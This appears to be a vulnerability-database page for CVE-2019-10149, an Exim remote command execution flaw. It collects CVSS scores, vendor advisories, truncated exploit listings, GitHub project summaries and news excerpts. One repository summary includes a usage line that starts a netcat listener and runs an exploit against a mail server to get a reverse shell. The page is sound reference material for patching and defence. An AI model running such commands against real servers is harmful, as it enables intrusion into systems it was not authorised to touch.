CVE-2019-10149

Published: 05/06/2019 Updated: 07/11/2022
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Exim incorrectly handled certain decoding operations. A remote attacker could possibly use this issue to execute arbitrary commands.

Vulnerable Product

exim exim

debian debian linux 9.0

canonical ubuntu linux 18.04

canonical ubuntu linux 18.10

Vendor Advisories

Exim could be made to run commands if it received specially crafted network traffic ...
The Qualys Research Labs reported a flaw in Exim, a mail transport agent. Improper validation of the recipient address in the deliver_message() function may result in the execution of arbitrary commands. For the stable distribution (stretch), this problem has been fixed in version 4.89-2+deb9u4. We recommend that you upgrade your exim4 packages. Fo ...
A flaw was found in Exim versions 4.87 to 4.91 before release 120 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution (CVE-2019-10149) ...
A flaw was found in the way exim validated recipient addresses. A remote attacker could use this flaw to execute arbitrary commands on the exim server with the permissions of the user running the application ...

Exploits

Qualys Security Advisory: The Return of the WIZard: RCE in Exim (CVE-2019-10149). Contents: Summary; Local exploitation; Remote exploitation (Non-default configurations; Default configuration); Acknowledgm ...
#!/bin/bash # # raptor_exim_wiz - "The Return of the WIZard" LPE exploit # Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeefinfo> # # A flaw was found in Exim versions 4.87 to 4.91 (inclusive). # Improper validation of recipient address in deliver_message() # function in /src/deliver.c may lead to remote command execution # (CVE-2019-10 ...
## # This module requires Metasploit: metasploit.com/download # Current source: github.com/rapid7/metasploit-framework ## require 'expect' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Li ...
This Metasploit module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges ...
Exim versions 4.87 through 4.91 suffer from a local privilege escalation vulnerability ...

Mailing Lists

oss-sec mailing list archives. Re: CVE-2019-10149: Exim 4.87 to 4.91: possible remote exploit. From: He ...
oss-sec mailing list archives. Re: CVE-2019-10149: Exim 4.87 to 4.91: possible remote exploit. From: So ...
oss-sec mailing list archives. Re: CVE-2019-10149: Exim 4.87 to 4.91: possible remote exploit. From: He ...

Github Repositories

Data Collection Related to Exim CVE-2019-10149

Exim CVE Data Collection: Data Collection Related to Exim Vulnerabilities CVE-2019-10149, CVE-2019-15846, CVE-2019-16928. CVE Announcement: cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10149 Exploit Details: www.exploit-db.com/exploits/46974 Issue Timeline: seclists.org/fulldisclosure/2019/Jun/16 NSA Advisory: mediadefensegov/2020/May/28/2002

Instructions for installing a vulnerable version of Exim and its exploitation

CVE-2019-10149 - Exim 4.87 < 4.91. Instructions for installing a vulnerable version of Exim and its exploitation. Tested on Linux Ubuntu 16.04, Exim 4.89. Exim installation: Download and extract exim version 4.89: wget github.com/Exim/exim/releases/download/exim-4_89/exim-4.89.tar.xz && tar -xvf exim-4.89.tar.xz Move into the extracted folder: cd exi

CVE-2019-10149 privilege escalation

CVE-2019-10149 privilege escalation "poc"

SNP Assignment on a Linux vulnerability

CVE-2019-10149 SNP Assignment on a Linux vulnerability

Simple Bash shell quick fix CVE-2019-10149

CVE-2019-10149-quick Simple Bash shell quick fix CVE-2019-10149

Libaz: Recently someone used a known Exim exploit CVE-2019-10149 on an unpatched server. We found out very fast due to Exim not being able to boot. We secured as much of the trail as we could to maybe help you deal with this yourself. The infection: An infected email was sent to the server which performed a malicious download and install of a script. We noticed an entry like this i

Simple Python socket connection to test if Exim is vulnerable to CVE-2019-10149. The payload simply touches a file in /tmp/eximrce.

eximrce: Simple Python socket connection to test if Exim is vulnerable to CVE-2019-10149. The payload simply touches a file in /root/lweximtest. Output will be slow depending on server's reply and not knowing how to properly use python's socket module. Would love a lesson on how to speed it up. Only tested on cPanel boxes. Run locally on suspected server. This checks for

PoC for CVE-2019-10149; this vulnerability could be exploited in versions 4.87 to 4.91 of the Exim server.

PoC-CVE-2019-10149_Exim: MNEMO-CERT has developed a PoC that allows commands to be executed with elevated privileges by exploiting the vulnerability CVE-2019-10149, which affects several versions of Exim (4.87 - 4.91). To exploit this vulnerability locally, the command to be executed must be defined. On the other hand, for the remot

EXIM-487-CVE-2019-10149 setup lab for educational purpose

Some personal exploits/pocs

Exploits: Miscellaneous proof of concept exploit code for testing purposes. Current Exploits: Fortinet FortiOS 600 <= 604, 560 <= 568, 541 <= 5410: The magic backdoor (CVE-2018-13382); Strato HiDrive <= 5010 LPE (CVE-2019-9486); Exim 4.87 < 4.91 LPE (CVE-2019-10149); ASUS Aura Sync <= 10771 Stack-Based Buffer Overflow (CVE-

CVE-2019-10149

CVE-2019-10149 - Exim 4.87 < 4.91. Instructions for installing a vulnerable version of Exim and its exploitation. Tested on Linux Ubuntu 16.04, Exim 4.89. Exim installation: Download and extract exim version 4.89: wget github.com/Exim/exim/releases/download/exim-4_89/exim-4.89.tar.xz && tar -xvf exim-4.89.tar.xz Move into the extracted folder: cd exi

CVE-2019-10149 : A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.

CVE-2019-10149: A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution. Example: nc -lvp 9000 python /CVE-2019-10149/exploit.py --rhost example.com --rport 25 --lhost 101010100 --lport 9000

Exim Honey Pot for CVE-2019-10149 exploit attempts.

StickyExim: An Email HoneyPot. Features: Easy to deploy. The install script does all the work. Abuse reports are automatically created and sent to the attacking IP owner. Abuse reports are stored with a hash at time of creation in case needed later. Requirements: Domain names. One real domain you use for normal email. Example: myrealdomain.com One domain for the HoneyPot(s) E

Recent Articles

APT trends report Q2 2020
Securelist • GReAT • 29 Jul 2020

For more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of. This is our latest installment, focus...

It's not every day the NSA publicly warns of attacks by Kremlin hackers – so take this critical Exim flaw seriously
The Register • Shaun Nichols in San Francisco • 29 May 2020

GRU crew actively exploit hole – but you patched it months ago, right? American intelligence follows British lead in warning of serious VPN vulnerabilities

The NSA has raised the alarm over what it says is Russia's active exploitation of a remote-code execution flaw in Exim for which a patch exists. The American surveillance super-agency said [PDF] on Thursday the Kremlin's military intelligence hackers are actively targeting some systems vulnerable to CVE-2019-10149, a security hole in the widely used Exim mail transfer agent (MTA) that was fixed last June. Here's a sample of Moscow's exploit code, according to the NSA, which is sent to a vulnerab...